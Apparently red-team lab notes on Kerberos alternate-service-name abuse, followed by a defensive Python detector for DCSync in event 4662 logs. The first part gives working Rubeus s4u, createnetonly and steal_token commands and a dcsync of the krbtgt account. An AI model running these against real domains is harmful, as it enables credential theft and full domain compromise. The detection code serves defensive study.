Alternate Service Name

The cifs service can be leveraged for lateral movement, but what if port 445 were unavailable, or we wanted an option other than PsExec? Since the cifs service runs under the computer account by default, we can request a TGS for any other service that also runs under that computer account.

This can be abused using the /altservice flag in Rubeus. In this example, we use the same TGT for SQL-2 to request a TGS for LDAP instead of CIFS.

Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /altservice:ldap /user:sql-2$ /ticket:doIFpD[...]MuSU8= /nowrap
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIGaD[...]ljLmlv
steal_token 2580

Against a domain controller, the LDAP service allows us to perform a dcsync.

dcsync dev.cyberbotic.io DEV\krbtgt
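From the defender's side, the ticket request itself gives little away: the service name in a ticket is not bound to the SPN the client later presents, and event 4769 on the KDC identifies the service by account (DC-2$) rather than by SPN, so a ticket obtained for cifs and used against ldap looks like any other ticket for the domain controller. What does remain visible is the replication that the LDAP ticket enables: the DC logs event 4662 with the DS-Replication-Get-Changes control-access rights under the identity performing the sync. The check below is an added example, not part of the original notes or of Rubeus; it runs over constructed 4662 records (only a subset of the real fields is modelled) and flags replication rights exercised by any account that is not a domain controller.

```python
"""Detect directory replication by non-DC accounts in constructed 4662 events."""
import re
from dataclasses import dataclass

# Control-access right GUIDs used by AD replication (real, documented values).
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

CONTROL_ACCESS = 0x100  # ADS_RIGHT_DS_CONTROL_ACCESS bit in the 4662 AccessMask
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)


@dataclass(frozen=True)
class Event4662:
    """Subset of a Windows 4662 event; field names follow the event XML."""
    computer: str      # DC that logged the event
    subject_user: str  # SubjectUserName: who exercised the access
    access_mask: int   # AccessMask (0x100 = Control Access)
    properties: str    # Properties: contains the access-right GUIDs


def replication_rights(ev: Event4662) -> set[str]:
    """Return the replication GUIDs present in the event's Properties field."""
    return {g.lower() for g in GUID_RE.findall(ev.properties)} & REPLICATION_GUIDS


def is_dcsync(ev: Event4662, dc_accounts, allowlist=frozenset()) -> bool:
    """True when a non-DC, non-allowlisted principal exercised replication rights."""
    if not ev.access_mask & CONTROL_ACCESS:
        return False
    if not replication_rights(ev):
        return False
    who = ev.subject_user.upper()
    expected = {a.upper() for a in dc_accounts} | {a.upper() for a in allowlist}
    return who not in expected


def find_dcsync(events, dc_accounts, allowlist=frozenset()):
    """Return (subject, dc) pairs for every event that looks like a DCSync."""
    return [(ev.computer, ev.subject_user) for ev in events
            if is_dcsync(ev, dc_accounts, allowlist)]


# Constructed sample events (not captured from a real environment).
SAMPLE_EVENTS = [
    # Normal: a domain controller replicating.
    Event4662("dc-2.dev.cyberbotic.io", "DC-2$", 0x100,
              "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
              "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    # Suspicious: a user account exercising both replication rights.
    Event4662("dc-2.dev.cyberbotic.io", "nlamb", 0x100,
              "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
              "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    # Benign: a write with an unrelated (constructed placeholder) GUID.
    Event4662("dc-2.dev.cyberbotic.io", "nlamb", 0x20,
              "{deadbeef-0000-4000-8000-000000000001}"),
]

if __name__ == "__main__":
    for dc, who in find_dcsync(SAMPLE_EVENTS, dc_accounts={"DC-2$"}):
        print(f"possible DCSync on {dc} by {who}")
```

The allowlist parameter exists because some legitimate services (directory synchronisation tools, for example) hold replication rights under a dedicated account; those should be enumerated explicitly rather than silencing the rule for all service accounts.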
